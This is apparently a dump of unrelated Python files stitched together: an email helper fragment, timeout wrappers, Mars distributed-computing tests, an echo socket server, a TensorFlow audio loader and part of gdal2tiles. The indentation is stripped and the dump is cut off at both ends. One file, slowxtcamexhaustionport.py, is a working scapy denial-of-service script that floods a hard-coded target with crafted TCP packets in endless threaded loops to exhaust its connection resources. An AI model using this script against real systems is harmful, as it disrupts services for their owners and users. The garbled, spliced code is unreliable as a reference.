return thr
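# A minimal usage sketch; the recipient, subject, template name and keyword
# arguments are illustrative and must exist in the calling application.
# Must run inside an application/request context so current_app resolves:
#
#     thr = send_email('user@example.com', 'Confirm your account',
#                      'email/confirm', user=user, token=token)
#     thr.join()  # optional: block until the background send completes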
|
calllimit.py
|
# -*- coding: utf-8 -*-
# @Author: xiaodong
# @Date : 2021/5/29
import time
import typing
import asyncio
import functools
import contextvars
from functools import wraps
from threading import Thread, Event
class LimitExecuteDuration:
"""
    Limit the execution time of a function; if the function exceeds the timeout, it is ended directly.
--- usage:
def your_func(*args, **kwargs):
...
return ...
ins = LimitExecuteDuration(seconds=1).run(your_func, *args, **kwargs)
your_need = ins._result
"""
def __init__(self, seconds: int = 10):
self.seconds = seconds
self._result = None
self._event = Event()
def set_event(self):
self._event.wait(self.seconds)
self._event.set()
def execute(self, func, *args, **kwargs):
if not self._event.is_set():
result = func(*args, **kwargs)
self._result = result
def run(self, func, *args, **kwargs):
t1 = Thread(target=self.execute, args=(func, *args), kwargs=kwargs)
t2 = Thread(target=self.set_event, )
t1.start()
t2.start()
t1.join(self.seconds)
return self
# code from starlette.concurrency
async def run_in_threadpool(
func: typing.Callable, *args: typing.Any, **kwargs: typing.Any
) -> typing.Any:
loop = asyncio.get_event_loop()
if contextvars is not None:
# Ensure we run in the same context
child = functools.partial(func, *args, **kwargs)
context = contextvars.copy_context()
func = context.run
args = (child,)
elif kwargs:
# loop.run_in_executor doesn't accept 'kwargs', so bind them in here
func = functools.partial(func, **kwargs)
return await loop.run_in_executor(None, func, *args)
class LimitExecuteDurationWithAsync:
def __init__(self, seconds: int = 10):
self.seconds = seconds
self._result = None
async def run(self, func, *args, **kwargs):
only_marker = kwargs.pop("marker", False)
if only_marker:
task = asyncio.create_task(
func(*args, **kwargs)
)
else:
task = run_in_threadpool(func, *args, **kwargs)
try:
ret = await asyncio.wait_for(
task, timeout=self.seconds,
)
self._result = ret
except asyncio.TimeoutError:
if hasattr(task, "cancel"):
task.cancel()
except Exception as e:
print(e)
finally:
return self
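# A minimal usage sketch of both wrappers; `slow` is an illustrative
# blocking function.
if __name__ == "__main__":
    def slow(x):
        time.sleep(3)
        return x
    # Synchronous wrapper: stops waiting after 1 second, so _result is still None here.
    print(LimitExecuteDuration(seconds=1).run(slow, 42)._result)
    async def demo():
        # Asynchronous wrapper: run the blocking call in a thread pool with a 1s timeout.
        ins = await LimitExecuteDurationWithAsync(seconds=1).run(slow, 42)
        print(ins._result)
    asyncio.run(demo())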
|
test_local.py
|
# Copyright 1999-2021 Alibaba Group Holding Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import asyncio
import os
import threading
import tempfile
import time
import uuid
import numpy as np
import pandas as pd
import pytest
try:
import vineyard
except ImportError:
vineyard = None
from .... import dataframe as md
from .... import tensor as mt
from .... import remote as mr
from ....config import option_context
from ....lib.aio import new_isolation
from ....storage import StorageLevel
from ....services.storage import StorageAPI
from ....tensor.arithmetic.add import TensorAdd
from ..local import new_cluster
from ..service import load_config
from ..session import get_default_async_session, \
get_default_session, new_session, execute, fetch, fetch_infos, \
stop_server, AsyncSession, _IsolatedWebSession
from .modules.utils import ( # noqa: F401; pylint: disable=unused-variable
cleanup_third_party_modules_output,
get_output_filenames,
)
CONFIG_TEST_FILE = os.path.join(
os.path.dirname(__file__), 'local_test_config.yml')
CONFIG_VINEYARD_TEST_FILE = os.path.join(
os.path.dirname(__file__), 'local_test_with_vineyard_config.yml')
CONFIG_THIRD_PARTY_MODULES_TEST_FILE = os.path.join(
os.path.dirname(__file__), 'local_test_with_third_parity_modules_config.yml')
params = ['default']
if vineyard is not None:
params.append('vineyard')
@pytest.fixture(params=params)
async def create_cluster(request):
if request.param == 'default':
config = CONFIG_TEST_FILE
elif request.param == 'vineyard':
config = CONFIG_VINEYARD_TEST_FILE
start_method = os.environ.get('POOL_START_METHOD', None)
client = await new_cluster(subprocess_start_method=start_method,
config=config,
n_worker=2,
n_cpu=2,
use_uvloop=False)
async with client:
if request.param == 'default':
assert client.session.client is not None
yield client
def _assert_storage_cleaned(session_id: str,
addr: str,
level: StorageLevel):
async def _assert(session_id: str,
addr: str,
level: StorageLevel):
storage_api = await StorageAPI.create(session_id, addr)
assert len(await storage_api.list(level)) == 0
info = await storage_api.get_storage_level_info(level)
assert info.used_size == 0
isolation = new_isolation()
asyncio.run_coroutine_threadsafe(
_assert(session_id, addr, level), isolation.loop).result()
@pytest.mark.asyncio
async def test_execute(create_cluster):
session = get_default_async_session()
assert session.address is not None
assert session.session_id is not None
raw = np.random.RandomState(0).rand(10, 10)
a = mt.tensor(raw, chunk_size=5)
b = a + 1
info = await session.execute(b)
await info
assert info.result() is None
assert info.exception() is None
assert info.progress() == 1
np.testing.assert_equal(raw + 1, await session.fetch(b))
with pytest.raises(ValueError):
await session.fetch(b + 1)
with pytest.raises(ValueError):
await session.fetch(b[b < 0.6])
del a, b
@pytest.mark.asyncio
async def test_iterative_tiling(create_cluster):
session = get_default_async_session()
raw = np.random.RandomState(0).rand(30, 5)
raw_df = pd.DataFrame(raw, index=np.arange(1, 31))
df = md.DataFrame(raw_df, chunk_size=10)
df = df[df[0] < .7]
df2 = df.shift(2)
info = await session.execute(df2)
await info
assert info.result() is None
result = await session.fetch(df2)
expected = raw_df[raw_df[0] < .7].shift(2)
pd.testing.assert_frame_equal(result, expected)
# test meta
assert df2.index_value.min_val >= 1
assert df2.index_value.max_val <= 30
@pytest.mark.asyncio
async def test_execute_describe(create_cluster):
s = np.random.RandomState(0)
raw = pd.DataFrame(s.rand(100, 4), columns=list('abcd'))
df = md.DataFrame(raw, chunk_size=30)
session = get_default_async_session()
r = df.describe()
info = await session.execute(r)
await info
assert info.result() is None
assert info.exception() is None
assert info.progress() == 1
res = await session.fetch(r)
pd.testing.assert_frame_equal(res, raw.describe())
@pytest.mark.asyncio
async def test_sync_execute_in_async(create_cluster):
a = mt.ones((10, 10))
b = a + 1
res = b.to_numpy()
np.testing.assert_array_equal(res, np.ones((10, 10)) + 1)
@pytest.mark.asyncio
async def test_fetch_infos(create_cluster):
raw = np.random.RandomState(0).rand(30, 5)
raw_df = pd.DataFrame(raw, index=np.arange(1, 31))
df = md.DataFrame(raw_df, chunk_size=10)
df.execute()
fetched_infos = df.fetch_infos()
assert 'object_id' in fetched_infos
assert 'level' in fetched_infos
assert 'memory_size' in fetched_infos
assert 'store_size' in fetched_infos
assert 'band' in fetched_infos
fetch_infos((df, df), fields=None)
results_infos = mr.ExecutableTuple([df, df]).execute()._fetch_infos()
assert len(results_infos) == 2
assert 'object_id' in results_infos[0]
assert 'level' in results_infos[0]
assert 'memory_size' in results_infos[0]
assert 'store_size' in results_infos[0]
assert 'band' in results_infos[0]
def _my_func():
print('output from function')
async def _run_web_session_test(web_address):
session_id = str(uuid.uuid4())
session = await AsyncSession.init(web_address, session_id)
session.as_default()
raw = np.random.RandomState(0).rand(10, 10)
a = mt.tensor(raw, chunk_size=5)
b = a + 1
info = await session.execute(b)
await info
assert info.result() is None
assert info.exception() is None
assert info.progress() == 1
np.testing.assert_equal(raw + 1, await session.fetch(b))
del a, b
r = mr.spawn(_my_func)
info = await session.execute(r)
await info
assert info.result() is None
assert info.exception() is None
assert info.progress() == 1
assert 'output from function' in str(r.fetch_log(session=session))
assert 'output from function' in str(r.fetch_log(session=session,
offsets='0k',
sizes=[1000]))
assert 'output from function' in str(r.fetch_log(session=session,
offsets={r.op.key: '0k'},
sizes=[1000]))
AsyncSession.reset_default()
await session.destroy()
@pytest.mark.asyncio
async def test_web_session(create_cluster):
session_id = str(uuid.uuid4())
web_address = create_cluster.web_address
session = await AsyncSession.init(web_address, session_id)
assert await session.get_web_endpoint() == web_address
session.as_default()
assert isinstance(session._isolated_session, _IsolatedWebSession)
await test_execute(create_cluster)
await test_iterative_tiling(create_cluster)
AsyncSession.reset_default()
await session.destroy()
await _run_web_session_test(web_address)
def test_sync_execute():
session = new_session(n_cpu=2, web=False, use_uvloop=False)
# web not started
assert session._session.client.web_address is None
assert session.get_web_endpoint() is None
with session:
raw = np.random.RandomState(0).rand(10, 5)
a = mt.tensor(raw, chunk_size=5).sum(axis=1)
b = a.execute(show_progress=False)
assert b is a
result = a.fetch()
np.testing.assert_array_equal(result, raw.sum(axis=1))
c = b + 1
c.execute(show_progress=False)
result = c.fetch()
np.testing.assert_array_equal(result, raw.sum(axis=1) + 1)
c = mt.tensor(raw, chunk_size=5).sum()
d = session.execute(c)
assert d is c
assert abs(session.fetch(d) - raw.sum()) < 0.001
with tempfile.TemporaryDirectory() as tempdir:
file_path = os.path.join(tempdir, 'test.csv')
pdf = pd.DataFrame(np.random.RandomState(0).rand(100, 10),
columns=[f'col{i}' for i in range(10)])
pdf.to_csv(file_path, index=False)
df = md.read_csv(file_path, chunk_bytes=os.stat(file_path).st_size / 5)
result = df.sum(axis=1).execute().fetch()
expected = pd.read_csv(file_path).sum(axis=1)
pd.testing.assert_series_equal(result, expected)
df = md.read_csv(file_path, chunk_bytes=os.stat(file_path).st_size / 5)
result = df.head(10).execute().fetch()
expected = pd.read_csv(file_path).head(10)
pd.testing.assert_frame_equal(result, expected)
for worker_pool in session._session.client._cluster._worker_pools:
_assert_storage_cleaned(session.session_id, worker_pool.external_address,
StorageLevel.MEMORY)
session.stop_server()
assert get_default_async_session() is None
def test_no_default_session():
raw = np.random.RandomState(0).rand(10, 10)
a = mt.tensor(raw, chunk_size=5)
b = a + 1
with pytest.warns(Warning):
execute(b, show_progress=False)
np.testing.assert_array_equal(fetch(b), raw + 1)
fetch_infos(b, fields=None)
assert get_default_async_session() is not None
stop_server()
assert get_default_async_session() is None
@pytest.fixture
def setup_session():
session = new_session(n_cpu=2, use_uvloop=False)
assert session.get_web_endpoint() is not None
with session:
with option_context({'show_progress': False}):
yield session
session.stop_server()
def test_decref(setup_session):
session = setup_session
a = mt.ones((10, 10))
b = mt.ones((10, 10))
c = b + 1
d = mt.ones((5, 5))
a.execute()
b.execute()
c.execute()
d.execute()
del a
ref_counts = session._get_ref_counts()
assert len(ref_counts) == 3
del b
ref_counts = session._get_ref_counts()
assert len(ref_counts) == 3
del c
ref_counts = session._get_ref_counts()
assert len(ref_counts) == 1
del d
ref_counts = session._get_ref_counts()
assert len(ref_counts) == 0
rs = np.random.RandomState(0)
pdf = pd.DataFrame({
'a': rs.randint(10, size=10),
'b': rs.rand(10)
})
df = md.DataFrame(pdf, chunk_size=5)
df2 = df.groupby('a').agg('mean', method='shuffle')
result = df2.execute().fetch()
expected = pdf.groupby('a').agg('mean')
pd.testing.assert_frame_equal(result, expected)
del df, df2
ref_counts = session._get_ref_counts()
assert len(ref_counts) == 0
worker_addr = session._session.client._cluster._worker_pools[0].external_address
_assert_storage_cleaned(session.session_id, worker_addr, StorageLevel.MEMORY)
def _cancel_when_execute(session, cancelled):
def run():
time.sleep(200)
rs = [mr.spawn(run) for _ in range(10)]
execute(*rs, cancelled=cancelled)
assert all(not r._executed_sessions for r in rs)
del rs
ref_counts = session._get_ref_counts()
assert len(ref_counts) == 0
worker_addr = session._session.client._cluster._worker_pools[0].external_address
_assert_storage_cleaned(session.session_id, worker_addr, StorageLevel.MEMORY)
class SlowTileAdd(TensorAdd):
@classmethod
def tile(cls, op):
time.sleep(2)
return (yield from TensorAdd.tile(op))
def _cancel_when_tile(session, cancelled):
a = mt.tensor([1, 2, 3])
for i in range(20):
a = SlowTileAdd(dtype=np.dtype(np.int64))(a, 1)
execute(a, cancelled=cancelled)
assert not a._executed_sessions
del a
ref_counts = session._get_ref_counts()
assert len(ref_counts) == 0
@pytest.mark.parametrize(
'test_func', [_cancel_when_execute, _cancel_when_tile])
def test_cancel(setup_session, test_func):
session = setup_session
async def _new_cancel_event():
return asyncio.Event()
isolation = new_isolation()
cancelled = asyncio.run_coroutine_threadsafe(
_new_cancel_event(), isolation.loop).result()
def cancel():
time.sleep(.5)
cancelled.set()
t = threading.Thread(target=cancel)
t.daemon = True
t.start()
start = time.time()
test_func(session, cancelled)
assert time.time() - start < 20
# submit another task
raw = np.random.rand(10, 10)
t = mt.tensor(raw, chunk_size=(10, 5))
np.testing.assert_array_equal(t.execute().fetch(), raw)
def test_load_third_party_modules(cleanup_third_party_modules_output): # noqa: F811
config = load_config()
config['third_party_modules'] = set()
with pytest.raises(TypeError, match='set'):
new_session(n_cpu=2, web=False, config=config)
config['third_party_modules'] = {'supervisor': ['not_exists_for_supervisor']}
with pytest.raises(ModuleNotFoundError, match='not_exists_for_supervisor'):
new_session(n_cpu=2, web=False, config=config)
config['third_party_modules'] = {'worker': ['not_exists_for_worker']}
with pytest.raises(ModuleNotFoundError, match='not_exists_for_worker'):
new_session(n_cpu=2, web=False, config=config)
config['third_party_modules'] = ['mars.deploy.oscar.tests.modules.replace_op']
session = new_session(n_cpu=2, web=False, config=config)
# web not started
assert session._session.client.web_address is None
with session:
raw = np.random.RandomState(0).rand(10, 10)
a = mt.tensor(raw, chunk_size=5)
b = a + 1
b.execute(show_progress=False)
result = b.fetch()
np.testing.assert_equal(raw - 1, result)
session.stop_server()
assert get_default_session() is None
session = new_session(n_cpu=2, web=False,
config=CONFIG_THIRD_PARTY_MODULES_TEST_FILE)
# web not started
assert session._session.client.web_address is None
with session:
        # 1 main pool, 3 sub pools (2 worker + 1 io).
assert len(get_output_filenames()) == 4
session.stop_server()
assert get_default_session() is None
|
threadedServer.py
|
'''
see https://stackoverflow.com/questions/23828264/how-to-make-a-simple-multithreaded-socket-server-in-python-that-remembers-client
'''
import socket
import threading
class ThreadedServer(object):
def __init__(self, host, port):
self.host = host
self.port = port
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.sock.bind((self.host, self.port))
def listen(self):
self.sock.listen(5)
while True:
client, address = self.sock.accept()
client.settimeout(60)
threading.Thread(target = self.listenToClient,args = (client,address)).start()
def listenToClient(self, client, address):
size = 1024
while True:
try:
data = client.recv(size)
if data:
                    # Set the response to echo back the received data
response = data
client.send(response)
else:
                    raise socket.error('Client disconnected')
except:
client.close()
return False
if __name__ == "__main__":
while True:
port_num = input("Port? ")
try:
port_num = int(port_num)
break
except ValueError:
pass
ThreadedServer('',port_num).listen()
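# A quick way to exercise the echo server from another shell (the port below is
# whatever was entered at the "Port? " prompt; 5555 is illustrative):
#
#     import socket
#     s = socket.create_connection(('localhost', 5555))
#     s.sendall(b'hello')
#     print(s.recv(1024))   # -> b'hello'
#     s.close()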
|
slowxtcamexhaustionport.py
|
from scapy.all import *
import time
from random import randint
import threading
from threading import Thread
from multiprocessing import Pool, Process
import os
'''The Internet Assigned Numbers Authority (IANA) suggests the range 49152 to 65535
(2^15 + 2^14 to 2^16 - 1) for dynamic or private ports. Many Linux kernels use the port
range 32768 to 61000. FreeBSD has used the IANA port range since release 4.6.'''
#targetIP = '192.168.1.150'
targetIP = '192.168.1.100'
my_ip = '192.168.1.200'
def send_while(pkt_list,i):
while True:
now = time.time()
send(pkt_list)
elapsed = time.time() - now
print "Has been sent", i,"packets in:", elapsed,"seconds."
time.sleep(randint(0,3))
#send(pkt_list, inter=0.25, loop=1)
list_size = 20
pkt_list = []
i = 0
#49912==760
#49952==800
#49827==675
#49832==680
for port in range(49152,49832):
spoofed_pkt = IP(src=my_ip,dst=targetIP) / TCP(sport=port,dport=80)
pkt_list.append(spoofed_pkt)
i = i+1
if i >=list_size:
#Process(target=send_pkts, args=(pkt_list,)).start()
Thread(target=send_while, args=(pkt_list,i,)).start()
i = 0
pkt_list = []
time.sleep(randint(3,10))
|
audio_reader.py
|
from __future__ import print_function
import os
import random
import re
import threading
import librosa
import numpy as np
import tensorflow as tf
def load_audio_alignments(audio_root_dir, alignment_list_file,
sample_rate, context):
'''Load the audio waveforms and alignments from a list file.
The file format is
wav_path user_# : phone#_1 ... phone#_N : log_f0_1 .. log_f0_N
where phone#_t* ints are per-frame phone labels at 100 frames/second
and log_f0_* are per-frame log-f0 values.
'''
assert sample_rate % 100 == 0 # We'll need this.
epoch = 0
files = []
alignments = {}
iphone = iuser = 0
with open(alignment_list_file) as f:
for line in f:
a = line.rstrip().split()
path = os.path.join(audio_root_dir, a.pop(0))
user = int(a.pop(0))
if user >= iuser:
iuser = user+1
assert a.pop(0) == ':'
alen = (len(a) - 1)//(context+1)
assert a[alen*context] == ':'
frame_labels = np.array([int(_) for _ in a[0:alen*context]],
dtype=np.int32)
frame_lf0 = np.array([float(_) for _ in a[alen*context+1:]],
dtype=np.float32)
for i, phone in enumerate(frame_labels):
if phone >= iphone:
iphone = phone+1
frame_labels = frame_labels.reshape(-1, context)
files.append(path)
alignments[path] = user, frame_labels, frame_lf0
print("files length: {} users {} phones {}".format(
len(files), iuser, iphone))
return files, alignments, iuser, iphone
# Never finishes.
def audio_iterator(files, alignments, sample_rate, n_mfcc):
epoch = 0
while True:
random.shuffle(files)
for filename in files:
user_id, frame_labels, frame_lf0 = alignments[filename]
audio, _ = librosa.load(filename, sr=sample_rate, mono=True)
# normalize audio
maxv = np.max(np.abs(audio))
if maxv > 1e-5:
audio *= 1.0/maxv
repeat_factor = sample_rate//100
sample_labels = frame_labels.repeat(repeat_factor, axis=0)
sample_lf0 = frame_lf0.repeat(repeat_factor)
audio = audio[:sample_labels.shape[0]] # clip off the excess.
user = np.full((sample_labels.shape[0],), user_id, dtype=np.int32)
mfcc = librosa.feature.mfcc(
audio[:-1], sr=sample_rate, n_mfcc=n_mfcc,
hop_length=repeat_factor, n_fft=400).transpose()
mfcc = mfcc.repeat(repeat_factor, axis=0)
assert len(audio) == len(sample_labels) == len(user) == \
mfcc.shape[0]
yield filename, audio, user, sample_labels, sample_lf0, mfcc
print("Epoch {} ended".format(epoch))
epoch += 1
def trim_silence(audio, user, alignment, lf0, mfcc, threshold):
'''Removes silence at the beginning and end of a sample.'''
energy = librosa.feature.rmse(audio)
frames = np.nonzero(energy > threshold)
indices = librosa.core.frames_to_samples(frames)[1]
# Note: indices can be an empty array if the whole audio was silence.
if indices.size:
audio = audio[indices[0]:indices[-1]]
user = user[indices[0]:indices[-1]]
alignment = alignment[indices[0]:indices[-1], :]
lf0 = lf0[indices[0]:indices[-1]]
mfcc = mfcc[indices[0]:indices[-1], :]
else:
audio = audio[0:0]
user = user[0:0]
alignment = alignment[0:0, :]
lf0 = lf0[0:0]
mfcc = mfcc[0:0, :]
return audio, user, alignment, lf0, mfcc
class AudioReader(object):
'''Generic background audio reader that preprocesses audio files
and enqueues them into a TensorFlow queue.'''
def __init__(self, audio_root_dir, alignment_list_file, coord, sample_rate,
chunk_size, overlap=0, reverse=False, silence_threshold=None,
n_chunks=5, queue_size=5, n_mfcc=12, context=2):
assert chunk_size > overlap
self.coord = coord
self.sample_rate = sample_rate
self.chunk_size = chunk_size
self.reverse = reverse
self.silence_threshold = silence_threshold
self.n_chunks = n_chunks
self.overlap = overlap
self.n_mfcc = n_mfcc
self.context = context # Hard coded for now.
self.threads = []
self.sample_placeholder = tf.placeholder(dtype=tf.float32, shape=None)
self.user_placeholder = tf.placeholder(dtype=tf.int32, shape=None)
self.align_placeholder = tf.placeholder(dtype=tf.int32, shape=None)
self.lf0_placeholder = tf.placeholder(dtype=tf.float32, shape=None)
self.mfcc_placeholder = tf.placeholder(dtype=tf.float32, shape=None)
self.queue = tf.PaddingFIFOQueue(
queue_size,
['float32', 'int32', 'int32', 'float32', 'float32'],
shapes=[(None,), (None,), (None, self.context), (None,),
(None, self.n_mfcc)])
self.enqueue = self.queue.enqueue([self.sample_placeholder,
self.user_placeholder,
self.align_placeholder,
self.lf0_placeholder,
self.mfcc_placeholder])
self.files, self.alignments, self.n_users, self.n_phones = \
load_audio_alignments(audio_root_dir, alignment_list_file,
sample_rate, context)
def dequeue(self, num_elements):
output = self.queue.dequeue_many(num_elements)
return output
# Thread main is a little tricky. We want to enqueue multiple chunks,
    # each from a separate utterance (so that we have speaker diversity
    # for each training minibatch).
    # We keep an array of buffers for this. We cut fixed-size chunks
# out of the buffers. As each buffer exhausts, we load a new
# audio file (using audio_iterator) and concatenate it with the
# buffer remnants.
def thread_main(self, sess):
# buffers: the array of buffers.
buffers = [(np.array([], dtype=np.float32),
np.array([], dtype=np.int32),
np.array([], dtype=np.int32).reshape(0, self.context),
np.array([], dtype=np.float32),
np.array([], dtype=np.float32).reshape(0, self.n_mfcc)
)]*self.n_chunks
# next(iterator) will never stop. It will allow us to go
# through the data set multiple times.
iterator = audio_iterator(self.files, self.alignments,
self.sample_rate, self.n_mfcc)
# Inflate chunk_size by the amount of overlap for convenience:
orig_chunk_size = self.chunk_size
padded_chunk_size = orig_chunk_size + self.overlap
stop = False
while not stop:
# Each entry of the buffers array has 5 elements:
# 1) audio, 2) user ID, 3) phone alignments, 4) lf0, 5) MFCCs.
for i, (buffer_, buf_user, buf_align, buf_lf0, buf_mfcc) in \
enumerate(buffers):
if self.coord.should_stop():
stop = True
break
assert len(buffer_) == len(buf_user) == buf_align.shape[0] == \
len(buf_lf0) == buf_mfcc.shape[0]
# Cut samples into fixed size pieces.
# top up the current buffers[i] element if it
# is too short.
while len(buffer_) < padded_chunk_size + 1:
filename, audio, user, alignment, lf0, mfcc = \
next(iterator)
if self.silence_threshold is not None:
# Remove silence
audio, user, alignment, lf0, mfcc = \
trim_silence(audio, user, alignment, lf0, mfcc,
self.silence_threshold)
if audio.size == 0:
print("Warning: {} was ignored as it contains "
"only silence. Consider decreasing "
"trim_silence threshold, or adjust volume "
"of the audio.".format(filename))
if not self.reverse:
buffer_ = np.append(buffer_, audio)
buf_user = np.append(buf_user, user)
buf_align = np.append(buf_align, alignment, axis=0)
buf_lf0 = np.append(buf_lf0, lf0)
buf_mfcc = np.append(buf_mfcc, mfcc, axis=0)
else:
buffer_ = np.append(audio, buffer_)
buf_user = np.append(user, buf_user)
buf_align = np.append(alignment, buf_align, axis=0)
buf_lf0 = np.append(lf0, buf_lf0)
buf_mfcc = np.append(mfcc, buf_mfcc, axis=0)
# Send one piece
if not self.reverse:
piece = buffer_[:padded_chunk_size+1]
piece_user = buf_user[:padded_chunk_size]
piece_align = buf_align[:padded_chunk_size, :]
piece_lf0 = buf_lf0[:padded_chunk_size]
piece_mfcc = buf_mfcc[:padded_chunk_size, :]
buffer_ = buffer_[orig_chunk_size:]
buf_user = buf_user[orig_chunk_size:]
buf_align = buf_align[orig_chunk_size:, :]
buf_lf0 = buf_lf0[orig_chunk_size:]
buf_mfcc = buf_mfcc[orig_chunk_size:, :]
else:
piece = buffer_[-padded_chunk_size-1:]
piece_user = buf_user[-padded_chunk_size:]
piece_align = buf_align[-padded_chunk_size:, :]
piece_lf0 = buf_lf0[-padded_chunk_size:]
piece_mfcc = buf_mfcc[-padded_chunk_size:, :]
buffer_ = buffer_[:-orig_chunk_size]
buf_user = buf_user[:-orig_chunk_size]
buf_align = buf_align[:-orig_chunk_size, :]
buf_lf0 = buf_lf0[:-orig_chunk_size]
buf_mfcc = buf_mfcc[:-orig_chunk_size, :]
sess.run(
self.enqueue,
feed_dict={self.sample_placeholder: piece,
self.user_placeholder: piece_user,
self.align_placeholder: piece_align,
self.lf0_placeholder: piece_lf0,
self.mfcc_placeholder: piece_mfcc})
buffers[i] = (buffer_, buf_user, buf_align, buf_lf0, buf_mfcc)
def start_threads(self, sess, n_threads=1):
for _ in range(n_threads):
thread = threading.Thread(target=self.thread_main, args=(sess,))
thread.daemon = True # Thread will close when parent quits.
thread.start()
self.threads.append(thread)
return self.threads
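# A minimal usage sketch: the paths 'corpus/wav' and 'alignments.txt' are
# hypothetical placeholders and the hyperparameters are illustrative only
# (assumes TensorFlow 1.x, matching the queue/placeholder API used above).
def _example_audio_reader_usage():
    coord = tf.train.Coordinator()
    reader = AudioReader('corpus/wav', 'alignments.txt', coord,
                         sample_rate=16000, chunk_size=1600, overlap=64,
                         silence_threshold=0.1)
    batch = reader.dequeue(4)  # one padded minibatch of 4 chunks
    with tf.Session() as sess:
        reader.start_threads(sess, n_threads=2)
        audio, user, align, lf0, mfcc = sess.run(batch)
        coord.request_stop()
    return audio, user, align, lf0, mfcc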
|
gdal2tiles.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# ******************************************************************************
# $Id$
#
# Project: Google Summer of Code 2007, 2008 (http://code.google.com/soc/)
# Support: BRGM (http://www.brgm.fr)
# Purpose: Convert a raster into TMS (Tile Map Service) tiles in a directory.
# - generate Google Earth metadata (KML SuperOverlay)
# - generate simple HTML viewer based on Google Maps and OpenLayers
# - support of global tiles (Spherical Mercator) for compatibility
# with interactive web maps a la Google Maps
# Author: Klokan Petr Pridal, klokan at klokan dot cz
# Web: http://www.klokan.cz/projects/gdal2tiles/
# GUI: http://www.maptiler.org/
#
###############################################################################
# Copyright (c) 2008, Klokan Petr Pridal
# Copyright (c) 2010-2013, Even Rouault <even dot rouault at mines-paris dot org>
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
# ******************************************************************************
from __future__ import print_function, division
import math
from multiprocessing import Pipe, Pool, Process, Manager
import os
import tempfile
import shutil
import sys
import time
from uuid import uuid4
from xml.etree import ElementTree
from osgeo import gdal
from osgeo import osr
try:
from PIL import Image
import numpy
import osgeo.gdal_array as gdalarray
except Exception:
# 'antialias' resampling is not available
pass
__version__ = "$Id$"
resampling_list = ('average', 'near', 'bilinear', 'cubic', 'cubicspline', 'lanczos', 'antialias')
profile_list = ('mercator', 'geodetic', 'raster')
webviewer_list = ('all', 'google', 'openlayers', 'leaflet', 'none')
# =============================================================================
# =============================================================================
# =============================================================================
__doc__globalmaptiles = """
globalmaptiles.py
Global Map Tiles as defined in Tile Map Service (TMS) Profiles
==============================================================
Functions necessary for generation of global tiles used on the web.
It contains classes implementing coordinate conversions for:
- GlobalMercator (based on EPSG:3857)
for Google Maps, Yahoo Maps, Bing Maps compatible tiles
- GlobalGeodetic (based on EPSG:4326)
for OpenLayers Base Map and Google Earth compatible tiles
More info at:
http://wiki.osgeo.org/wiki/Tile_Map_Service_Specification
http://wiki.osgeo.org/wiki/WMS_Tiling_Client_Recommendation
http://msdn.microsoft.com/en-us/library/bb259689.aspx
http://code.google.com/apis/maps/documentation/overlays.html#Google_Maps_Coordinates
Created by Klokan Petr Pridal on 2008-07-03.
Google Summer of Code 2008, project GDAL2Tiles for OSGEO.
In case you use this class in your product, translate it to another language
or find it useful for your project please let me know.
My email: klokan at klokan dot cz.
I would like to know where it was used.
Class is available under the open-source GDAL license (www.gdal.org).
"""
MAXZOOMLEVEL = 32
class GlobalMercator(object):
r"""
TMS Global Mercator Profile
---------------------------
Functions necessary for generation of tiles in Spherical Mercator projection,
EPSG:3857.
Such tiles are compatible with Google Maps, Bing Maps, Yahoo Maps,
UK Ordnance Survey OpenSpace API, ...
and you can overlay them on top of base maps of those web mapping applications.
Pixel and tile coordinates are in TMS notation (origin [0,0] in bottom-left).
What coordinate conversions do we need for TMS Global Mercator tiles::
LatLon <-> Meters <-> Pixels <-> Tile
WGS84 coordinates Spherical Mercator Pixels in pyramid Tiles in pyramid
lat/lon XY in meters XY pixels Z zoom XYZ from TMS
EPSG:4326           EPSG:3857
.----. --------- -- TMS
/ \ <-> | | <-> /----/ <-> Google
\ / | | /--------/ QuadTree
----- --------- /------------/
KML, public WebMapService Web Clients TileMapService
What is the coordinate extent of Earth in EPSG:3857?
[-20037508.342789244, -20037508.342789244, 20037508.342789244, 20037508.342789244]
The constant 20037508.342789244 is half of the Earth's circumference in meters
(the full circumference is roughly 40 thousand kilometers); the coordinate origin is in the middle of the extent.
In fact you can calculate the constant as: 2 * math.pi * 6378137 / 2.0
$ echo 180 85 | gdaltransform -s_srs EPSG:4326 -t_srs EPSG:3857
Polar areas with abs(latitude) bigger than 85.05112878 are clipped off.
What are zoom level constants (pixels/meter) for pyramid with EPSG:3857?
whole region is on top of pyramid (zoom=0) covered by 256x256 pixels tile,
every lower zoom level resolution is always divided by two
initialResolution = 20037508.342789244 * 2 / 256 = 156543.03392804062
What is the difference between TMS and Google Maps/QuadTree tile name convention?
The tile raster itself is the same (equal extent, projection, pixel size),
there is just different identification of the same raster tile.
Tiles in TMS are counted from [0,0] in the bottom-left corner, id is XYZ.
Google placed the origin [0,0] to the top-left corner, reference is XYZ.
Microsoft is referencing tiles by a QuadTree name, defined on the website:
http://msdn2.microsoft.com/en-us/library/bb259689.aspx
The lat/lon coordinates are using WGS84 datum, yes?
